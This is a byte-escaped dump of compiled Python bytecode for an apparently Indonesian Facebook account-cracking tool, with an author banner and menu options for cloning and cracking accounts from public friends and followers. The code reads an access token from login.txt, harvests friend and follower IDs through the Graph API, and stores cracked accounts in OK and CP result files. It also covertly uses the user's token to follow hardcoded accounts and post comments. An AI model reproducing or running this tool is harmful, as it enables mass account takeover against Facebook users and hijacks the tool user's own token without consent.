\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;97m \n \n \x1b[1;95m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x80\xa2 \x1b[1;92m\xe2\x97\x8f \x1b[1;95m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90 \x1b[1;92m\xe2\x97\x8f \x1b[1;97m\x1b[1;95m\xe2\x80\xa2\xe2\x95\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 \n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Author : \x1b[1;96m\xe2\x98\x86 ANGGA \x1b[1;93m\xe2\x84\xa2 \x1b[1;96m\xe2\x98\x86 \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Github : \x1b[1;96mhttps://github.com/Bajingan-Z \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Facebook : \x1b[1;96mAngga \x1b[1;93m\xe2\x84\xa2 \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Instagram : \x1b[1;96mraka_andrian27 \x1b[1;97m\n\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Twitter : \x1b[1;96mBangsat_XD \x1b[1;97m\n \x1b[1;95m\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x80\xa2 \x1b[1;92m\xe2\x97\x8f \x1b[1;95m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90 \x1b[1;92m\xe2\x97\x8f \x1b[1;97m\x1b[1;95m\xe2\x80\xa2\xe2\x95\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80 (\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00logo?\x00\x00\x00s\x04\x00\x00\x00\x00\x01\r\x0fc\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x8d\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x11\x00t\x02\x00j\x03\x00d\x02\x00\x83\x01\x00\x01Wn!\x00\x04t\x02\x00j\x04\x00j\x05\x00k\n\x00rA\x00\x01\x01\x01t\x06\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x1a\x00t\x07\x00d\x04\x00d\x05\x00\x83\x02\x00}\x00\x00t\x08\x00\x83\x00\x00\x01Wn*\x01\x04t\t\x00k\n\x00r\x88\x01\x01}\x01\x00\x01t\n\x00d\x06\x00\x83\x01\x00}\x00\x00|\x00\x00d\x07\x00k\x02\x00r\x8e\x00d\x08\x00GHn\x00\x00y\xcc\x00t\x02\x00j\x03\x00d\t\x00|\x00\x00\x17\x83\x01\x00j\x0b\x00\x83\x00\x00d\n\x00\x19j\x0c\x00\x83\x00\x00}\x02\x00t\x07\x00d\x04\x00d\x0b\x00\x83\x02\x00j\r\x00|\x00\x00\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x0c\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\r\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x0e\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x0f\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x10\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x11\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x12\x00|\x00\x00\x17\x83\x01\x00\x01t\x02\x00j\x0e\x00d\x13\x00|\x00\x00\x17\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01Wq\x89\x01\x04t\t\x00k\n\x00r\x84\x01\x01\x01\x01t\x00\x00j\x01\x00d\x14\x00\x83\x01\x00\x01t\x06\x00d\x15\x00\x83\x01\x00\x01q\x89\x01Xn\x01\x00Xd\x00\x00S(\x16\x00\x00\x00NR%\x00\x00\x00s\x1b\x00\x00\x00https://mbasic.facebook.coms\x19\x00\x00\x00Internet Connection Errors\t\x00\x00\x00login.txtt\x01\x00\x00\x00rs9\x00\x00\x00[\xe2\x80\xa2] TOKEN \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4 : t\x00\x00\x00\x00s\x0b\x00\x00\x00Wrong Inputs+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00namet\x01\x00\x00\x00wsD\x00\x00\x00https://graph.facebook.com/100017584682867/subscribers?access_token=sD\x00\x00\x00https://graph.facebook.com/100000395779504/subscribers?access_token=sD\x00\x00\x00https://graph.facebook.com/100000834003593/subscribers?access_token=sD\x00\x00\x00https://graph.facebook.com/100003986228742/subscribers?access_token=sD\x00\x00\x00https://graph.facebook.com/100006184624502/subscribers?access_token=sW\x00\x00\x00https://graph.facebook.com/4257706904267068/comments?message=krend Bang !&access_token=sm\x00\x00\x00https://graph.facebook.com/953529338576547/comments?message=Raka Orang Terganteng diindonesia !&access_token=sy\x00\x00\x00https://graph.facebook.com/3882176535153442/comments/?message=Moga Langgeng Aa Raka Sama Tth Manda Nya :) !&access_token=s\x0f\x00\x00\x00rm -f login.txts\x0f\x00\x00\x00[?] Login Error(\x0f\x00\x00\x00R&\x00\x00\x00R\'\x00\x00\x00t\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\n\x00\x00\x00exceptionst\x0f\x00\x00\x00ConnectionErrort\x04\x00\x00\x00exitt\x04\x00\x00\x00opent\x04\x00\x00\x00menut\x08\x00\x00\x00KeyErrort\t\x00\x00\x00raw_inputt\x04\x00\x00\x00jsont\x05\x00\x00\x00lowerR\x12\x00\x00\x00t\x04\x00\x00\x00post(\x03\x00\x00\x00t\x05\x00\x00\x00tokent\x07\x00\x00\x00IOErrort\x04\x00\x00\x00nama(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00loginP\x00\x00\x00s6\x00\x00\x00\x00\x01\r\x01\x03\x02\x11\x01\x13\x01\x0e\x01\x03\x01\x0f\x01\x0b\x01\x0f\x01\x0c\x01\x0c\x01\x08\x01\x03\x01#\x01\x16\x02\x11\x01\x11\x01\x11\x01\x11\x01\x11\x01\x11\x01\x11\x01\x11\x01\x0b\x01\r\x01\r\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x07\x04\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn(\x00\x04t\x05\x00k\n\x00rP\x00\x01\x01\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01t\x06\x00d\x05\x00\x83\x01\x00\x01n\x01\x00Xy\'\x00t\x07\x00j\x08\x00d\x06\x00t\x04\x00\x17\x83\x01\x00j\t\x00\x83\x00\x00d\x07\x00\x19j\n\x00\x83\x00\x00}\x00\x00WnH\x00\x04t\x0b\x00k\n\x00r\xa2\x00\x01\x01\x01t\x00\x00j\x01\x00d\x04\x00\x83\x01\x00\x01t\x06\x00d\x08\x00\x83\x01\x00\x01n!\x00\x04t\x07\x00j\x0c\x00j\r\x00k\n\x00r\xc2\x00\x01\x01\x01t\x06\x00d\t\x00\x83\x01\x00\x01n\x01\x00Xt\x0e\x00\x83\x00\x00\x01d\n\x00GHd\x0b\x00t\x0f\x00\x16GHd\x0c\x00|\x00\x00\x17d\r\x00\x17GHd\n\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x11\x00GHd\x12\x00GHd\x13\x00GHt\x10\x00d\x14\x00\x83\x01\x00}\x01\x00|\x01\x00d\x15\x00k\x02\x00r*\x01t\x11\x00\x83\x00\x00\x01n\xd9\x02|\x01\x00d\x16\x00k\x02\x00sB\x01|\x01\x00d\x17\x00k\x02\x00rS\x01t\x12\x00\x83\x00\x00\x01t\x13\x00\x83\x00\x00\x01n\xb0\x02|\x01\x00d\x18\x00k\x02\x00sk\x01|\x01\x00d\x19\x00k\x02\x00r|\x01t\x14\x00\x83\x00\x00\x01t\x13\x00\x83\x00\x00\x01n\x87\x02|\x01\x00d\x1a\x00k\x02\x00s\x94\x01|\x01\x00d\x1b\x00k\x02\x00r\xa5\x01t\x15\x00\x83\x00\x00\x01t\x13\x00\x83\x00\x00\x01n^\x02|\x01\x00d\x1c\x00k\x02\x00s\xbd\x01|\x01\x00d\x1d\x00k\x02\x00r\x03\x04d\x1e\x00GHd\x1f\x00GHd \x00GHd\x1e\x00GHt\x10\x00d!\x00\x83\x01\x00}\x02\x00|\x02\x00d\x15\x00k\x02\x00r\xf3\x01t\x11\x00\x83\x00\x00\x01n\x06\x02|\x02\x00d\x16\x00k\x02\x00r\xf6\x02t\x00\x00j\x16\x00d"\x00\x83\x01\x00}\x03\x00d#\x00GHx\x17\x00|\x03\x00D]\x0f\x00}\x04\x00d$\x00|\x04\x00\x17GHq\x1a\x02WyB\x00t\x10\x00d%\x00\x83\x01\x00}\x04\x00|\x04\x00d\x15\x00k\x02\x00rR\x02t\x11\x00\x83\x00\x00\x01n\x00\x00t\x02\x00d&\x00|\x04\x00\x16\x83\x01\x00j\x03\x00\x83\x00\x00j\x17\x00\x83\x00\x00}\x05\x00Wn\x1f\x00\x04t\x0b\x00k\n\x00r\x90\x02\x01\x01\x01t\x06\x00d\'\x00|\x04\x00\x16\x83\x01\x00\x01n\x01\x00Xd(\x00|\x04\x00\x16j\x18\x00d)\x00d\x1e\x00\x83\x02\x00}\x06\x00|\x06\x00j\x18\x00d*\x00d\x15\x00\x83\x02\x00}\x07\x00d+\x00GHd,\x00|\x07\x00t\x19\x00|\x05\x00\x83\x01\x00f\x02\x00\x16GHt\x00\x00j\x01\x00d-\x00|\x04\x00\x16\x83\x01\x00\x01d.\x00GHt\x06\x00d\x1e\x00\x83\x01\x00\x01n\x03\x01|\x02\x00d\x18\x00k\x02\x00r\xf9\x03t\x00\x00j\x16\x00d/\x00\x83\x01\x00}\x03\x00d0\x00GHx\x17\x00|\x03\x00D]\x0f\x00}\x04\x00d1\x00|\x04\x00\x17GHq\x1d\x03WyB\x00t\x10\x00d2\x00\x83\x01\x00}\x04\x00|\x04\x00d\x15\x00k\x02\x00rU\x03t\x11\x00\x83\x00\x00\x01n\x00\x00t\x02\x00d3\x00|\x04\x00\x16\x83\x01\x00j\x03\x00\x83\x00\x00j\x17\x00\x83\x00\x00}\x08\x00Wn\x1f\x00\x04t\x0b\x00k\n\x00r\x93\x03\x01\x01\x01t\x06\x00d\'\x00|\x04\x00\x16\x83\x01\x00\x01n\x01\x00Xd(\x00|\x04\x00\x16j\x18\x00d)\x00d\x1e\x00\x83\x02\x00}\x06\x00|\x06\x00j\x18\x00d*\x00d\x15\x00\x83\x02\x00}\x07\x00d4\x00GHd5\x00|\x07\x00t\x19\x00|\x08\x00\x83\x01\x00f\x02\x00\x16GHt\x00\x00j\x01\x00d6\x00|\x04\x00\x16\x83\x01\x00\x01d7\x00GHt\x06\x00d\x1e\x00\x83\x01\x00\x01n\x00\x00t\x11\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(8\x00\x00\x00NR%\x00\x00\x00s\t\x00\x00\x00login.txtR)\x00\x00\x00s\x0f\x00\x00\x00rm -f login.txts\x0f\x00\x00\x00[?] Login Errors,\x00\x00\x00https://graph.facebook.com/me/?access_token=R+\x00\x00\x00s$\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Token Errors\x19\x00\x00\x00 ! no internet connections\\\x00\x00\x00\x1b[1;96m\x1b[1;91m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;96m\x1b[1;92m \x1b[1;96m==================================================s<\x00\x00\x00\x1b[1;96m\x1b[1;92m<>\x1b[1;96m\x1b[1;92m \x1b[1;97mBergabung : \x1b[1;93m%ss:\x00\x00\x00\x1b[1;96m\x1b[1;92m<>\x1b[1;96m\x1b[1;92m \x1b[1;97mWelcome : \x1b[1;93ms\x17\x00\x00\x00\x1b[1;92m \x1b[1;95m \x1b[1;96msQ\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Clone from public friendssS\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Crack from public followerssr\x00\x00\x00\x1b[1;96m[\x1b[1;93m3\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Multi cracking from public Id\x1b[1;97m [ \x1b[1;95mPro \x1b[1;97m]sK\x00\x00\x00\x1b[1;96m[\x1b[1;93m4\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Check crack resultssi\x00\x00\x00\x1b[1;96m[\x1b[1;93m5\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m User-agent settings \x1b[1;97m [ \x1b[1;95mPro \x1b[1;97m]sb\x00\x00\x00\x1b[1;96m[\x1b[1;93m6\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Exit\x1b[1;97m [ \x1b[1;91mRemove-Token \x1b[1;97m]sA\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Option : R*\x00\x00\x00t\x01\x00\x00\x001R\x19\x00\x00\x00t\x01\x00\x00\x002R\x1a\x00\x00\x00t\x01\x00\x00\x003R\x1b\x00\x00\x00t\x01\x00\x00\x004R\x1c\x00\x00\x00t\x01\x00\x00\x00 sT\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Check results RAKA_AMANDA OKsT\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Check results RAKA_AMANDA CPsB\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2\x1b[1;97m Option : t\x02\x00\x00\x00OKs<\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Copy file name and past into inputs\x06\x00\x00\x00[\xc2\xae] s&\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] file name : s\x05\x00\x00\x00OK/%ss\x19\x00\x00\x00 ! file %s tidak tersedias\x02\x00\x00\x00%st\x01\x00\x00\x00-s\x04\x00\x00\x00.txts1\x00\x00\x00 # ----------------------------------------------s%\x00\x00\x00 Crack Resulte : %s Total : %s\x1b[0;92ms\t\x00\x00\x00cat OK/%ss9\x00\x00\x00 \x1b[0;94m # ----------------------------------------------t\x02\x00\x00\x00CPs;\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] Copy File Name And Past into Inputs\x03\x00\x00\x00 + s&\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] File Name : s\x05\x00\x00\x00CP/%ss0\x00\x00\x00# ----------------------------------------------s%\x00\x00\x00 Crack results : %s total : %s\x1b[0;93ms\t\x00\x00\x00cat CP/%ss8\x00\x00\x00\x1b[0;96m # ----------------------------------------------(\x1a\x00\x00\x00R&\x00\x00\x00R\'\x00\x00\x00R2\x00\x00\x00t\x04\x00\x00\x00readR9\x00\x00\x00R4\x00\x00\x00R1\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00R7\x00\x00\x00R:\x00\x00\x00R/\x00\x00\x00R0\x00\x00\x00R(\x00\x00\x00t\x03\x00\x00\x00tglR5\x00\x00\x00R3\x00\x00\x00t\x06\x00\x00\x00publikt\x06\x00\x00\x00methodt\x08\x00\x00\x00followert\x06\x00\x00\x00massalt\x07\x00\x00\x00listdirt\n\x00\x00\x00splitlinest\x07\x00\x00\x00replacet\x03\x00\x00\x00len(\t\x00\x00\x00R;\x00\x00\x00t\x05\x00\x00\x00Bilalt\x03\x00\x00\x00cekt\x04\x00\x00\x00dirst\x04\x00\x00\x00filet\x07\x00\x00\x00Totalokt\x07\x00\x00\x00nm_filet\x07\x00\x00\x00del_txtt\x07\x00\x00\x00Totalcp(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R3\x00\x00\x00p\x00\x00\x00s\xa6\x00\x00\x00\x00\x01\r\x02\x03\x01\x19\x01\r\x01\r\x01\x0e\x01\x03\x01\'\x01\r\x01\r\x01\r\x01\x13\x01\x0e\x03\x07\x01\x05\x01\t\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x02\x0c\x01\x0c\x01\n\x01\x18\x01\x07\x01\n\x01\x18\x01\x07\x01\n\x01\x18\x01\x07\x01\n\x01\x18\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\x0f\x01\x05\x01\r\x01\r\x01\x03\x01\x0c\x01\x0c\x01\n\x01 \x01\r\x01\x12\x01\x16\x01\x12\x01\x05\x01\x15\x01\x11\x01\x05\x01\r\x01\x0c\x01\x0f\x01\x05\x01\r\x01\r\x01\x03\x01\x0c\x01\x0c\x01\n\x01 \x01\r\x01\x12\x01\x16\x01\x12\x01\x05\x01\x15\x01\x11\x01\x05\x01\r\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xdc\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xt\x05\x00d\x04\x00\x83\x01\x00}\x00\x00yh\x00xa\x00t\x06\x00j\x07\x00d\x05\x00|\x00\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x08\x00\x83\x00\x00d\x06\x00\x19D]<\x00}\x01\x00|\x01\x00d\x07\x00\x19}\x02\x00|\x01\x00d\x08\x00\x19j\t\x00d\t\x00\x83\x01\x00d\n\x00\x19}\x03\x00t\n\x00j\x0b\x00|\x02\x00d\x0b\x00\x17|\x03\x00\x17\x83\x01\x00\x01qj\x00WWn\x1b\x00\x04t\x0c\x00k\n\x00r\xc8\x00\x01\x01\x01t\x04\x00d\x0c\x00\x83\x01\x00\x01n\x01\x00Xd\r\x00t\r\x00t\n\x00\x83\x01\x00\x16GHd\x00\x00S(\x0e\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s%\x00\x00\x00\n\x1b[1;96m[\x1b[1;93m!\x1b[1;96m] Token Errors\'\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id : s5\x00\x00\x00https://graph.facebook.com/%s/friends?access_token=%st\x04\x00\x00\x00datat\x02\x00\x00\x00idR+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s6\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Account friend list is not publics7\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total Id : \x1b[0;91m%s\x1b[0;97m(\x0e\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00R5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00t\x06\x00\x00\x00rsplitRX\x00\x00\x00t\x06\x00\x00\x00appendR4\x00\x00\x00RN\x00\x00\x00(\x04\x00\x00\x00t\x03\x00\x00\x00idtt\x01\x00\x00\x00it\x03\x00\x00\x00uidR;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RG\x00\x00\x00\xc9\x00\x00\x00s\x1a\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x0c\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\x0e\x01c\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xdc\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xt\x05\x00d\x04\x00\x83\x01\x00}\x00\x00yh\x00xa\x00t\x06\x00j\x07\x00d\x05\x00|\x00\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x08\x00\x83\x00\x00d\x06\x00\x19D]<\x00}\x01\x00|\x01\x00d\x07\x00\x19}\x02\x00|\x01\x00d\x08\x00\x19j\t\x00d\t\x00\x83\x01\x00d\n\x00\x19}\x03\x00t\n\x00j\x0b\x00|\x02\x00d\x0b\x00\x17|\x03\x00\x17\x83\x01\x00\x01qj\x00WWn\x1b\x00\x04t\x0c\x00k\n\x00r\xc8\x00\x01\x01\x01t\x04\x00d\x0c\x00\x83\x01\x00\x01n\x01\x00Xd\r\x00t\r\x00t\n\x00\x83\x01\x00\x16GHd\x00\x00S(\x0e\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s%\x00\x00\x00\n\x1b[1;96m[\x1b[1;94m+\x1b[1;96m] Token Errors\'\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id : sD\x00\x00\x00https://graph.facebook.com/%s/subscribers?limit=5000&access_token=%sRW\x00\x00\x00RX\x00\x00\x00R+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s6\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Account friend list is not publics7\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total Id : \x1b[0;91m%s\x1b[0;97m(\x0e\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00R5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00RY\x00\x00\x00RX\x00\x00\x00RZ\x00\x00\x00R4\x00\x00\x00RN\x00\x00\x00(\x04\x00\x00\x00R[\x00\x00\x00R\\\x00\x00\x00R]\x00\x00\x00R;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RI\x00\x00\x00\xd9\x00\x00\x00s\x1a\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x0c\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\x0e\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x01\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x16\x00t\x05\x00t\x06\x00d\x04\x00\x83\x01\x00\x83\x01\x00}\x00\x00Wn\r\x00\x01\x01\x01d\x05\x00}\x00\x00n\x01\x00Xx\xaf\x00t\x07\x00|\x00\x00\x83\x01\x00D]\xa1\x00}\x01\x00|\x01\x00d\x05\x007}\x01\x00t\x08\x00d\x06\x00|\x01\x00\x16\x83\x01\x00}\x02\x00yh\x00xa\x00t\t\x00j\n\x00d\x07\x00|\x02\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x0b\x00\x83\x00\x00d\x08\x00\x19D]<\x00}\x03\x00|\x03\x00d\t\x00\x19}\x04\x00t\x0c\x00d\n\x00\x19j\r\x00d\x0b\x00\x83\x01\x00d\x0c\x00\x19}\x05\x00t\x0e\x00j\x0f\x00|\x04\x00d\r\x00\x17|\x05\x00\x17\x83\x01\x00\x01q\xb1\x00WWqj\x00\x04t\x10\x00k\n\x00r\n\x01\x01\x01\x01d\x0e\x00GHqj\x00Xqj\x00Wd\x0f\x00t\x11\x00t\x0e\x00\x83\x01\x00\x16GHd\x00\x00S(\x10\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s$\x00\x00\x00\x1b[1;96m[\x1b[1;94m+\x1b[1;96m] Token Errors0\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Enter Multiple ID Option : i\x01\x00\x00\x00s(\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id %s : s5\x00\x00\x00https://graph.facebook.com/%s/friends?access_token=%sRW\x00\x00\x00RX\x00\x00\x00R+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s3\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Ids friend list Is not publics3\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total id : 